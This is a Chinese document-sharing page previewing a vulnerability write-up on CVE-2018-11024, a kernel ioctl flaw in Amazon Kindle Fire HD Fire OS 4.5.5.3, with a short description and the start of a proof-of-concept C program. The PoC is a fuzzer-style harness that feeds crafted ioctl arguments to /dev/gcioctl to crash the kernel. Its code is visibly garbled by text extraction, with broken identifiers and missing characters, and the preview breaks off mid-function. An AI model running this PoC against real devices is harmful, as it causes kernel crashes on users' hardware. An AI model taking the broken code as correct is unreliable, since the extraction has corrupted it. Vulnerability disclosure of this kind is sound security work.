（CVE-2018-11024）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx

上传人：p**

文档编号：493936

上传时间：2023-09-19

格式：DOCX

页数：15

大小：24.15KB

《（CVE-2018-11024）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx》由会员分享，可在线阅读，更多相关《（CVE-2018-11024）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx（15页珍藏版）》请在第壹文秘上搜索。

1、(CVE-2018-11024) Amazon Kindle Fire HD (3rd) Fire OS kernel 组件安全漏洞一、漏洞简介Amazon Kindle Fire HD (3rd) FireOS 4.5.5.3 的内核组件中的内核模块 omapdriversmiscgcxgcioctlgcif.c 允许攻击者通过设备/ dev 上 ioctl 的参数注入特制参数/gcioctl使用命令1077435789并导致内核崩溃。二、漏洞影响Fire OS 4.5.5.3三、复现过程poc#include #include /strlen#include#include /inet_

2、addr#include /write#include #include #include #include #include / Socket boilerplate code taken from here: http:/ server-client-example-c-sockets-Iinux/ *seed, ioctl-idj num-mappingsj num-blobs dev-name-lenj dev-name map_e ntry_t_arr, blobs*/int debug = 1;typedef struct int src_id;int dst_id;int off

3、set; map_entry_t;short tiny_vals18 = 128, 127, 64, 63, 32, 31, 16, 15, 8, 7t % 3, 2,1, 0, 256, 255, -1；int *small_vals;int num_small_vals;/ populates small_vals when calledvoid populate_arrs(int top) int num = 1;int count = 0;while (num top) /printf(,%dn num);num = 1;small_vals = malloc(sizeof(int)*

4、count);memset(small_vals, 0, count);int i = 0;while(num 1) small_valsi = num;i+;small-valsi = num-1;i+;num = 1;small_valsi = 0;small_valsi+l = top;small_valsi+2 = top-1;small_valsi+3 = -1;)/ generate a random value of size size and store it in elem./ value has a weight % chance to be a small valuevo

5、id gen_rand_val(int size, char *elemj int small_weight) int i;if (rand() % 100) small_weight) / do small thingunsigned int idx = (rand() % num_small_vals); printf(Choosing %dn, small-valsidx);switch (size) case 2:idx = (rand() % 18);(short *)elem = tiny_valsidx; break;case 4:*(int *)elem = small_val

6、sidx; break;case 8:*(long long*)elem = small_valsidx;break;default:printf(Damn bro. Size: %dn,j size);exit(-l);else for(i=0; i size; i+) elemi = (char)(rand ()%0xl00);int main(int argc i char *argv)int num_blobs = 0, num_mappings = j i = 0, dev_name_len = 0, j;unsigned int ioctl_id = 0;char *dev_nam

7、e;void *tmp;char *ptr_arr;int *len_arr;unsigned int seed;int sockfd , client_sock i c , read_size;struct sockaddr_in server , client;int msg_size;void *generic_arr264;/ max val for small_vals arrayint top = 8192;int ent = 0;/ chance that our generics are filled with small vals,int default_weight = 5

8、0;populate_arrs(top);int retest = 1;goto rerun;sockfd = socket(AF_INET , SOCK_STREAM , 0);if (sockfd = -1) (printf(nCould not create socket);puts(,Socket created);setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &(int) 1 , sizeof(in t)；server.sin_family = AF_INET;server.sin_addr.s_addr = INADDR_ANY;serv

9、er.sin_port = htons(atoi(argvl);/Bindif( bind(sockfdj(struct sockaddr *)&server , sizeof(server) 0) /print the error messageperror(bind failed. Error*1);return 1;puts(,bind done);listen:/ Listenlisten(sockfd , 3);puts(Waiting for incoming connections.);c = sizeof(struct sockaddr_in);/ accept connect

10、ion from an incoming clientclient_sock = accept(sockfd, (struct sockaddr *)&client, (socklen_t *)&c)；if (client_sock 0 ) ( recv the entire messagechar *recv_buf = calloc(msg_size, sizeof(char);if (recv_buf = NULL) printf(Failed to allocate recv_bufn);exit(-l);int nrecvd = recv(client_sock, recv_bufj

11、 msg_size, 0);if (nrecvd != msg_size) printf(Error getting all data!n);printf(,nrecvd: %dnmsg_size:%dn, nrecvd, msg_size); eit(-l);/ quickly save a copy of the most recent dataint savefd = open(sdcardsaved, O_WRONLYO_TRUNCO_CREAT, 06 44);if (savefd 0) perror(open saved); exit(-l);int err = Write(SaV

12、efd, recv_bufj msg_size);if (err != msg_size) perror(write saved); exit(-l);fsync(savefd);close(savefd);rerun:if (retest) recv_buf = calloc(msg_sizej sizeof(char);int fd = open(,sdcardsavedj O_RDONLY);if (fd 0) perror(open:);exit(-l);int fsize = lseek(fd, 0, SEEK_END);printf(file size: %dn, fsize);l

13、seek(fdj 0, SEEK_SET); read(fdj recv_buffsize);)char *head = recv_buf;seed = 0;/seed, ioctl-idj num_mappings, num-blobsj dev_name_len, dev_na me, map_entry_t_arri blob-len-arrj blobsmemcpy(8tseedj head, 4);head += 4;memcpy(Sioctl-idj head, 4);head += 4;memcpy(&num_mappings, head, 4);head += 4;memcpy(Snum-blobsj head, 4);head += 4;memcpy(&dev_name_len, head, 4);head += 4;/ srand with new seed srand(seed);* dev name */dev_name = calloc(dev-name-len+lj sizeof(char);

文档加载中……请稍候！
如果长时间未打开，您也可以点击刷新试试。

下载文档到电脑，查找使用更方便

5 金币 0人已下载

下载	加入VIP,免费下载

版权申诉 word格式文档无特别注明外均可编辑修改；预览文档经过压缩，下载后原文更清晰！ 立即下载

配套讲稿：: 如PPT文件的首页显示word图标，表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
特殊限制：: 部分文档作品中含有的国旗、国徽等图片，仅作为作品整体效果示例展示，禁止商用。设计者仅对作品中独创性部分享有著作权。
关键词：: CVE-2018-11024Amazon Kindle Fire HD 3rd OS kernel组件安全漏洞 CVE 2018 11024 Amazon rd kernel 组件安全漏洞

第壹文秘所有资源均是用户自行上传分享，仅供网友学习交流，未经上传用户书面授权，请勿作他用。

关于本文

本文标题：（CVE-2018-11024）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx
链接地址：https://www.1wenmi.com/doc/493936.html